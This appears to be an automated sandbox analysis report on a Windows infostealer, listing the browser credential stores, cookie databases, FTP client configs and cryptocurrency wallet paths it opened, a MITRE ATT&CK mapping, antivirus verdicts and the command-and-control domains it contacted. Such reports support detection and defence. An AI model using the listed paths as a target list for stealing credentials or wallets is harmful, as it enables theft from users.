Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Electrum\wallets
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\ElectronCash\wallets
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\*
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aming\Exodus
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.0000000005097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ethereum
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\MultiDoge
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ledger Live
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTP Now\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Program Files (x86)\DeluxeFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\UltraFXP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPBox\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Program Files (x86)\GoFTP\settings\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BBQCoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Megacoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Mincoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Namecoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Primecoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Terracoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
        Source: Yara matchFile source: 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match; File source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR
        MITRE ATT&CK matrix (one line per tactic column; numbers in parentheses are the counts shown in the matrix for that technique):

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
        Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Defense Evasion: Masquerading (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Software Packing
        Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
        Discovery: System Time Discovery (2); Security Software Discovery (21); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (22)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
        Collection: Archive Collected Data (1); Data from Local System (4); Data from Network Shared Drive; Input Capture; Keylogging
        Command and Control: Encrypted Channel (21); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

        Source | Detection | Scanner | Label
        Gj8P0mbklo.exe | 58% | ReversingLabs | Win32.Trojan.Barys
        Gj8P0mbklo.exe | 62% | Virustotal |
        Gj8P0mbklo.exe | 100% | Avira | TR/PSW.Coins.ujryq
        Gj8P0mbklo.exe | 100% | Joe Sandbox ML |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        dervinko.biz | 1% | Virustotal |
        Source | Detection | Scanner | Label
        http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
        https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe
        http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
        http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
        https://recaptcha.net | 0% | URL Reputation | safe
        https://s.ytimg.com; | 0% | Avira URL Cloud | safe
        https://www.gstatic.cn/recaptcha/ | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up/b_ | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up/bAW | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up/bistAndAuditAlarmByHandle | 0% | Avira URL Cloud | safe
        https://steam.tv/ | 0% | Avira URL Cloud | safe
        https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e | 0% | Avira URL Cloud | safe
        http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up | 0% | Virustotal |
        https://lv.queniujq.cn | 0% | Avira URL Cloud | safe
        https://dervinko.biz/q | 0% | Avira URL Cloud | safe
        https://steam.tv/ | 0% | Virustotal |
        https://www.gstatic.cn/recaptcha/ | 0% | Virustotal |
        https://dervinko.biz | 0% | Avira URL Cloud | safe
        https://recaptcha.net/recaptcha/; | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up/bistAndAuditAlarmByHandleerta | 0% | Avira URL Cloud | safe
        https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e | 0% | Virustotal |
        https://medal.tv | 0% | Avira URL Cloud | safe
        https://dervinko.biz/ | 0% | Avira URL Cloud | safe
        https://dervinko.biz/Up/byDllc | 0% | Avira URL Cloud | safe
        https://recaptcha.net/recaptcha/; | 0% | Virustotal |
        https://dervinko.biz | 0% | Virustotal |
        https://medal.tv | 0% | Virustotal |
        https://dervinko.biz/Up/b | 0% | Avira URL Cloud | safe
        https://lv.queniujq.cn | 0% | Virustotal |
        http://127.0.0.1:27060 | 0% | Avira URL Cloud | safe
        https://dervinko.biz/ | 0% | Virustotal |
        http://127.0.0.1:27060 | 0% | Virustotal |
        https://dervinko.biz/Up/b | 0% | Virustotal |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        steamcommunity.com | 23.61.62.148 | true | false | | high
        dervinko.biz | 104.21.13.203 | true | false | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        https://dervinko.biz/Up | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        https://steamcommunity.com/profiles/76561199609719039 | false | | high
        https://dervinko.biz/Up/b | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://duckduckgo.com/chrome_newtab | Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://player.vimeo.com | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://duckduckgo.com/ac/?q= | Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=_Vry | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://steamcommunity.com/?subsection=broadcasts | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://store.steampowered.com/subscriber_agreement/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://www.gstatic.cn/recaptcha/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        http://www.valvesoftware.com/legal.htm | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://www.youtube.com | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://www.google.com | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://dervinko.biz/Up/bAW | Gj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://dervinko.biz/Up/b_ | Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6& | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://steamcommunity.com/profiles/76561199609719039/badges | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://s.ytimg.com; | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
        https://steam.tv/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        https://dervinko.biz/Up/bistAndAuditAlarmByHandle | Gj8P0mbklo.exe, 00000000.00000003.2151712465.00000000050CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        http://store.steampowered.com/privacy_agreement/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://store.steampowered.com/points/shop/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://crl.rootca1.amazontrust.com/rootca1.crl0 | Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://ocsp.rootca1.amazontrust.com0: | Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://sketchfab.com | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://www.ecosia.org/newtab/ | Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://lv.queniujq.cn | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
        https://www.youtube.com/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 76561199609719039[1].htm.0.dr | false | | high
        https://store.steampowered.com/privacy_agreement/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://dervinko.biz/q | Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://www.google.com/recaptcha/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://checkout.steampowered.com/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://store.steampowered.com/; | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://store.steampowered.com/about/ | 76561199609719039[1].htm.0.dr | false | | high
        https://steamcommunity.com/my/wishlist/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://steamcommunity.com/- | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://help.steampowered.com/en/ | Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://steamcommunity.com/market/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://store.steampowered.com/news/ | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | | high
        https://community.akamai.steamstatic.com/ | Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=roSu8uqw | Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | false | |
                                                                                                              high
                                                                                                              https://dervinko.bizGj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
